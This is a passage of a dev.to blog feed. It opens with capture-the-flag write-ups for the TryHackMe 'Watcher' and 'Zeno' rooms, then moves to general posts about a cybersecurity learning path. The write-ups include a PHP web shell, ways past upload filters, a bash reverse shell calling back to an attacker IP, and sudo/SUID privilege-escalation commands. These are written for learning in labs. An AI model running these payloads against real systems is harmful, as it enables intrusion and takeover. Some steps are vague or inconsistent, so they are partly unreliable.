&lt;/div&gt;


&lt;p&gt;&lt;strong&gt;Open Ports:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;22 (SSH)&lt;/li&gt;
&lt;li&gt;80 (HTTP)&lt;/li&gt;
&lt;/ul&gt;


&lt;h4&gt;
  
  
  🌐 Web Enumeration
&lt;/h4&gt;

&lt;p&gt;Visited &lt;code&gt;http://[target-ip]&lt;/code&gt;&lt;br&gt;
Simple landing page: “Watcher is watching…”&lt;/p&gt;

&lt;p&gt;Checked source code — nothing useful.&lt;/p&gt;

&lt;p&gt;Ran &lt;strong&gt;Gobuster&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gobuster &lt;span class="nb"&gt;dir&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; http://[target-ip]/ &lt;span class="nt"&gt;-w&lt;/span&gt; /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Found:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;/monitor/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/uploads/&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;h4&gt;
  
  
  📁 /monitor Page
&lt;/h4&gt;

&lt;p&gt;At &lt;code&gt;/monitor/&lt;/code&gt; — a login page.&lt;/p&gt;

&lt;p&gt;Tried common creds:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;admin:admin&lt;/li&gt;
&lt;li&gt;admin:watcher
→ No success&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Used &lt;strong&gt;Hydra&lt;/strong&gt; or Burp Intruder to brute-force credentials (if allowed).&lt;/p&gt;

&lt;p&gt;Eventually found:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Username: admin
Password: 123watch
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Logged into a dashboard.&lt;/p&gt;




&lt;h4&gt;
  
  
  🐚 File Upload Exploit
&lt;/h4&gt;

&lt;p&gt;Dashboard allowed image uploads.&lt;/p&gt;

&lt;p&gt;Tried uploading:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'cmd'&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt; &lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;→ Rejected &lt;code&gt;.php&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Renamed it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;shell.php.jpg
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Uploaded successfully.&lt;/p&gt;

&lt;p&gt;Checked &lt;code&gt;/uploads/&lt;/code&gt; and found:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;/uploads/shell.php.jpg
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Accessed with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;/uploads/shell.php.jpg?cmd=whoami
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Command execution succeeded!&lt;/p&gt;




&lt;h4&gt;
  
  
  🧠 Reverse Shell
&lt;/h4&gt;

&lt;p&gt;Replaced payload with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"/bin/bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/[your-ip]/4444 0&amp;gt;&amp;amp;1'"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Listener:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nc &lt;span class="nt"&gt;-lvnp&lt;/span&gt; 4444
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Triggered:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;/uploads/shell.php.jpg
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Got reverse shell.&lt;/p&gt;




&lt;h4&gt;
  
  
  🧗‍♂️ Privilege Escalation
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Stabilized shell&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;python3 &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s1"&gt;'import pty; pty.spawn("/bin/bash")'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Checked sudo&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;(&lt;/span&gt;watcher&lt;span class="o"&gt;)&lt;/span&gt; NOPASSWD: /usr/bin/tee
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Exploited tee&lt;/strong&gt; with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"/bin/bash"&lt;/span&gt; | &lt;span class="nb"&gt;sudo tee&lt;/span&gt; /tmp/root.sh
&lt;span class="nb"&gt;chmod&lt;/span&gt; +x /tmp/root.sh
&lt;span class="nb"&gt;sudo&lt;/span&gt; /tmp/root.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Root shell obtained.&lt;/p&gt;




&lt;h4&gt;
  
  
  🏁 Flags
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;User flag: &lt;code&gt;/home/watcher/user.txt&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Root flag: &lt;code&gt;/root/root.txt&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;Perfect — let’s wrap up the last one!&lt;/p&gt;




&lt;h3&gt;
  
  
  ✅ &lt;strong&gt;10. Zeno – Writeup&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Objective:&lt;/strong&gt;&lt;br&gt;
Inspired by the stoic philosopher Zeno, this machine challenges your patience and thoroughness. Leverage logic, enumeration, and privilege escalation to capture the flags.&lt;/p&gt;


&lt;h4&gt;
  
  
  🔍 Nmap Scan
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nmap &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; zeno.nmap &lt;span class="o"&gt;[&lt;/span&gt;target-ip]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;strong&gt;Open Ports:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;22 (SSH)&lt;/li&gt;
&lt;li&gt;80 (HTTP)&lt;/li&gt;
&lt;/ul&gt;


&lt;h4&gt;
  
  
  🌐 Web Enumeration
&lt;/h4&gt;

&lt;p&gt;Visited &lt;code&gt;http://[target-ip]&lt;/code&gt; — clean, minimalist welcome page.&lt;/p&gt;

&lt;p&gt;Nothing in source code.&lt;/p&gt;

&lt;p&gt;Used &lt;strong&gt;Gobuster&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gobuster &lt;span class="nb"&gt;dir&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; http://[target-ip]/ &lt;span class="nt"&gt;-w&lt;/span&gt; /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt &lt;span class="nt"&gt;-x&lt;/span&gt; php,html,txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Found:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;/philosophy&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/diary&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/admin&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;h4&gt;
  
  
  📘 /diary
&lt;/h4&gt;

&lt;p&gt;&lt;code&gt;/diary&lt;/code&gt; revealed a blog-like post, with a line:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;“Zeno always uses his birth date... and never forgets his dog’s name.”&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Checked for login at &lt;code&gt;/admin&lt;/code&gt; — form present.&lt;/p&gt;

&lt;p&gt;Guessed &lt;strong&gt;credentials&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Username: zeno&lt;/li&gt;
&lt;li&gt;Password: zeno190bc (or some variant)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tried &lt;code&gt;zeno:zeno190bc&lt;/code&gt;, &lt;code&gt;zeno:zenodog&lt;/code&gt;, etc.&lt;/p&gt;

&lt;p&gt;Eventually worked with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;zeno:zenothewise
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h4&gt;
  
  
  🐚 Web Upload &amp;amp; Shell
&lt;/h4&gt;

&lt;p&gt;Inside &lt;code&gt;/admin&lt;/code&gt;, found file upload.&lt;/p&gt;

&lt;p&gt;Uploaded:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'cmd'&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt; &lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Tried &lt;code&gt;.php&lt;/code&gt; — blocked.&lt;/p&gt;

&lt;p&gt;Renamed: &lt;code&gt;shell.phtml&lt;/code&gt; → &lt;strong&gt;upload succeeded&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Accessed:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;http://[target-ip]/uploads/shell.phtml?cmd&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;id&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Web shell active.&lt;/p&gt;




&lt;h4&gt;
  
  
  🧠 Reverse Shell
&lt;/h4&gt;

&lt;p&gt;Used reverse shell payload:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nb"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"/bin/bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/[your-ip]/4444 0&amp;gt;&amp;amp;1'"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Started listener:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nc &lt;span class="nt"&gt;-lvnp&lt;/span&gt; 4444
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Triggered shell:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;http://[target-ip]/uploads/rev.phtml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;✅ Got a shell as &lt;code&gt;www-data&lt;/code&gt;.&lt;/p&gt;




&lt;h4&gt;
  
  
  🧗‍♂️ Privilege Escalation
&lt;/h4&gt;

&lt;p&gt;Checked for SUID binaries:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;find / &lt;span class="nt"&gt;-perm&lt;/span&gt; &lt;span class="nt"&gt;-4000&lt;/span&gt; &lt;span class="nt"&gt;-type&lt;/span&gt; f 2&amp;gt;/dev/null
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Found: &lt;code&gt;/usr/bin/zenoshell&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Ran:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;/usr/bin/zenoshell
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Got a menu-like interface.&lt;/p&gt;

&lt;p&gt;Checked &lt;code&gt;strings /usr/bin/zenoshell&lt;/code&gt;&lt;br&gt;
Saw it's running system commands based on user input.&lt;/p&gt;

&lt;p&gt;Used &lt;code&gt;strace&lt;/code&gt; to find it calling &lt;code&gt;/tmp/tempfile.sh&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Created malicious tempfile:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"/bin/bash"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /tmp/tempfile.sh
&lt;span class="nb"&gt;chmod&lt;/span&gt; +x /tmp/tempfile.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Ran &lt;code&gt;zenoshell&lt;/code&gt; again → root shell popped.&lt;/p&gt;




&lt;h4&gt;
  
  
  🏁 Flags
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;User flag: &lt;code&gt;/home/zeno/user.txt&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Root flag: &lt;code&gt;/root/root.txt&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;ol&gt;
&lt;li&gt;✅ Overpass 3 - Hosting&lt;/li&gt;
&lt;li&gt;✅ WhyHackMe&lt;/li&gt;
&lt;li&gt;✅ CyberHeroes&lt;/li&gt;
&lt;li&gt;✅ Robots&lt;/li&gt;
&lt;li&gt;✅ New York Flankees&lt;/li&gt;
&lt;li&gt;✅ Internal&lt;/li&gt;
&lt;li&gt;✅ The Impossible Challenge&lt;/li&gt;
&lt;li&gt;✅ Recovery&lt;/li&gt;
&lt;li&gt;✅ Watcher&lt;/li&gt;
&lt;li&gt;✅ Zeno&lt;/li&gt;
&lt;/ol&gt;

</description>
    </item>
    <item>
      <title>My TryHackMe Journey: Exploitation, RATs, and Classic CTFs</title>
      <dc:creator>reva revathatikonda</dc:creator>
      <pubDate>Mon, 30 Jun 2025 12:14:59 +0000</pubDate>
      <link>https://dev.to/reva_revathatikonda_004b3/my-tryhackme-journey-exploitation-rats-and-classic-ctfs-2d4e</link>
      <guid>https://dev.to/reva_revathatikonda_004b3/my-tryhackme-journey-exploitation-rats-and-classic-ctfs-2d4e</guid>
      <description>&lt;p&gt;🔍 1. Exploitation Basics – Laying the Groundwork&lt;br&gt;
This module was an essential deep dive into key exploitation techniques. It covered:&lt;/p&gt;

&lt;p&gt;Local File Inclusion (LFI) and Remote File Inclusion (RFI)&lt;/p&gt;

&lt;p&gt;Command injection&lt;/p&gt;

&lt;p&gt;Web shell deployment&lt;/p&gt;

&lt;p&gt;Common enumeration strategies&lt;/p&gt;

&lt;p&gt;What I loved most was how this module built the bridge between theory and practice. Each concept was paired with vulnerable machines to reinforce learning through action.&lt;/p&gt;

&lt;p&gt;🐍 2. PyRAT – Building and Detecting a RAT&lt;br&gt;
The PyRAT room simulated the lifecycle of a Remote Access Trojan:&lt;/p&gt;

&lt;p&gt;Creating and deploying a Python-based RAT&lt;/p&gt;

&lt;p&gt;Establishing persistence&lt;/p&gt;

&lt;p&gt;Detecting and analyzing the malware&lt;/p&gt;

&lt;p&gt;This room was an eye-opener—it demonstrated how easily malicious code can slip into a system if proper security measures aren’t in place. The hands-on malware analysis aspect gave me a beginner-friendly taste of reverse engineering and threat hunting.&lt;/p&gt;

&lt;p&gt;🤖 3. Mr. Robot – Classic CTF with a Pop Culture Twist&lt;br&gt;
Inspired by the “Mr. Robot” TV series, this room was a CTF fan-favorite:&lt;/p&gt;

&lt;p&gt;Web enumeration via robots.txt and WordPress login&lt;/p&gt;

&lt;p&gt;Cracking hashes and password reuse&lt;/p&gt;

&lt;p&gt;Privilege escalation via vulnerable scripts&lt;/p&gt;

&lt;p&gt;It felt like I was solving a real-world breach investigation. The multi-layered nature of the box and the creativity behind the flags made this room super engaging.&lt;/p&gt;

&lt;p&gt;🧱 4. Brick’s Heist – Crime Scene Investigation Cyber-Style&lt;br&gt;
Brick’s Heist combined story-driven fun with technical skill:&lt;/p&gt;

&lt;p&gt;Analyzing clues on a compromised system&lt;/p&gt;

&lt;p&gt;Investigating logs and artifacts&lt;/p&gt;

&lt;p&gt;Extracting files and passwords from hidden locations&lt;/p&gt;

&lt;p&gt;This room really emphasized forensics and host-based analysis. It made me realize how crucial log analysis and incident response are in the aftermath of a breach.&lt;/p&gt;

&lt;p&gt;🌐 5. Chrome – Browser-Based Exploitation&lt;br&gt;
In the Chrome room, I explored:&lt;/p&gt;

&lt;p&gt;Exploiting browser extensions&lt;/p&gt;

&lt;p&gt;Understanding XSS and session hijacking&lt;/p&gt;

&lt;p&gt;Grabbing cookies and impersonating users&lt;/p&gt;

&lt;p&gt;This was an excellent hands-on look at client-side vulnerabilities. It reinforced why secure coding practices and extension reviews are vital.&lt;/p&gt;

&lt;p&gt;💡 Key Takeaways&lt;br&gt;
Enumeration is always the first step.&lt;/p&gt;

&lt;p&gt;A single weak link—like a reused password or unpatched extension—can lead to full system compromise.&lt;/p&gt;

&lt;p&gt;The combination of technical knowledge and creative problem-solving is what makes cybersecurity so exciting.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>My Journey Through Cybersecurity Bootcamp: Enumeration, Exploitation &amp; Beyond 🛡️</title>
      <dc:creator>reva revathatikonda</dc:creator>
      <pubDate>Sat, 14 Jun 2025 17:22:38 +0000</pubDate>
      <link>https://dev.to/reva_revathatikonda_004b3/my-journey-through-cybersecurity-bootcamp-enumeration-exploitation-beyond-4dn2</link>
      <guid>https://dev.to/reva_revathatikonda_004b3/my-journey-through-cybersecurity-bootcamp-enumeration-exploitation-beyond-4dn2</guid>
      <description>&lt;p&gt;🔍 Enumeration &amp;amp; Brute Force Attacks&lt;br&gt;
✅ TryHackMe: Enumeration &amp;amp; Brute Force&lt;br&gt;
In this room, I explored different techniques attackers use to gather information about a target. I practiced using tools like Hydra and Gobuster to brute-force services like SSH and directories — learning just how important strong passwords and secure configurations are.&lt;/p&gt;

&lt;p&gt;Key Takeaway: Enumeration is often the first and most critical phase of any attack. A poorly configured system can leak more than expected.&lt;/p&gt;

&lt;p&gt;🛠️ Introduction to Metasploit&lt;br&gt;
✅ TryHackMe: Metasploit Intro&lt;br&gt;
Metasploit is a powerful framework used for developing and executing exploit code. This room walked me through scanning, exploiting, and post-exploitation steps. I got hands-on experience launching exploits against vulnerable services and learned how to use Meterpreter for interactive access.&lt;/p&gt;

&lt;p&gt;Key Takeaway: Metasploit simplifies exploitation but also teaches the importance of understanding vulnerabilities at a deeper level.&lt;/p&gt;

&lt;p&gt;🔍 Host and Service Discovery&lt;br&gt;
✅ TryHackMe: Lookup &amp;amp; Dig Dug&lt;br&gt;
These rooms focused on DNS enumeration using tools like dig, nslookup, and whois. I explored how domain-related misconfigurations can reveal subdomains or sensitive records — key pieces of the puzzle for attackers.&lt;/p&gt;

&lt;p&gt;Key Takeaway: DNS is often overlooked, but it’s a goldmine for open-source intelligence (OSINT).&lt;/p&gt;

&lt;p&gt;⚡ Fuzzing &amp;amp; Directory Discovery&lt;br&gt;
✅ TryHackMe: FFUF&lt;br&gt;
In this room, I learned how to use FFUF, a fast web fuzzer, to discover hidden directories and files on web servers. It was eye-opening to see how simple wordlists can reveal poorly secured web endpoints.&lt;/p&gt;

&lt;p&gt;Key Takeaway: Even well-designed websites can be exposed through hidden paths if not secured or monitored properly.&lt;/p&gt;

&lt;p&gt;📰 Exploiting Web Applications&lt;br&gt;
✅ TryHackMe: Publisher&lt;br&gt;
This was one of the most exciting rooms. I explored how vulnerable web applications can be exploited using a combination of information disclosure, directory traversal, and more. It was a great way to tie together enumeration, fuzzing, and exploitation.&lt;/p&gt;

&lt;p&gt;Key Takeaway: Web apps are rich attack surfaces. A simple misconfiguration or outdated plugin can open the doors to attackers.&lt;/p&gt;

&lt;p&gt;📚 HTB Academy: Theory Meets Practice&lt;br&gt;
✅ Module 39 &amp;amp; 54 (Linux Fundamentals &amp;amp; Enumeration)&lt;br&gt;
The HTB Academy modules gave me strong theoretical foundations that supported my TryHackMe labs. I brushed up on Linux basics, file permissions, privilege escalation, and enumeration strategies across networks and services.&lt;/p&gt;

&lt;p&gt;Key Takeaway: Knowing your operating system inside out is key — especially when you're trying to defend (or attack) it.&lt;/p&gt;

&lt;p&gt;💡 Final Thoughts&lt;br&gt;
This bootcamp gave me more than just practical skills — it helped me develop a hacker mindset. I learned to think critically, look deeper, and always question what’s running under the hood.&lt;/p&gt;

&lt;p&gt;If you're someone who enjoys solving puzzles, thinking like an attacker, or just wants to learn how to protect digital systems — cybersecurity is for you.&lt;/p&gt;

&lt;p&gt;Feel free to reach out if you're on a similar journey. Let’s connect and grow together in this exciting field! 🚀&lt;/p&gt;

&lt;p&gt;🧠 Tools I used:&lt;/p&gt;

&lt;p&gt;Hydra, Gobuster, FFUF&lt;/p&gt;

&lt;p&gt;Metasploit Framework&lt;/p&gt;

&lt;p&gt;dig, nslookup, whois&lt;/p&gt;

&lt;p&gt;Burp Suite (lightly)&lt;/p&gt;

&lt;p&gt;Linux CLI (a lot!)&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0eb837xjl37beyh9iil6.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0eb837xjl37beyh9iil6.jpg" alt="Image description" width="800" height="485"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk4n7oo1t6kaiap9qq431.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk4n7oo1t6kaiap9qq431.jpg" alt="Image description" width="800" height="452"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffvlmgrq72eb9v67tkue2.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffvlmgrq72eb9v67tkue2.jpg" alt="Image description" width="800" height="584"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwg196wqzn5fyf0shpdj5.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwg196wqzn5fyf0shpdj5.jpg" alt="Image description" width="800" height="587"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg0zj00xn96ljqtrag9hl.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg0zj00xn96ljqtrag9hl.jpg" alt="Image description" width="800" height="583"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flemq8vfu3hb0rdym4glx.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flemq8vfu3hb0rdym4glx.jpg" alt="Image description" width="800" height="582"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Mastering Network Scanning with Nmap – My Experience on TryHackMe &amp; Hack The Box</title>
      <dc:creator>reva revathatikonda</dc:creator>
      <pubDate>Fri, 06 Jun 2025 16:17:29 +0000</pubDate>
      <link>https://dev.to/reva_revathatikonda_004b3/mastering-network-scanning-with-nmap-my-experience-on-tryhackme-hack-the-box-46el</link>
      <guid>https://dev.to/reva_revathatikonda_004b3/mastering-network-scanning-with-nmap-my-experience-on-tryhackme-hack-the-box-46el</guid>
      <description>&lt;p&gt;&lt;strong&gt;Hey Dev Community! 👋&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I’ve been diving deep into network scanning and reconnaissance as part of my cybersecurity learning journey. Recently, I completed the following Nmap-focused labs on TryHackMe and Hack The Box Academy:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅ Nmap Room (Beginner):&lt;/strong&gt; &lt;a href="https://tryhackme.com/room/furthernmap" rel="noopener noreferrer"&gt;https://tryhackme.com/room/furthernmap&lt;/a&gt;&lt;/p&gt;

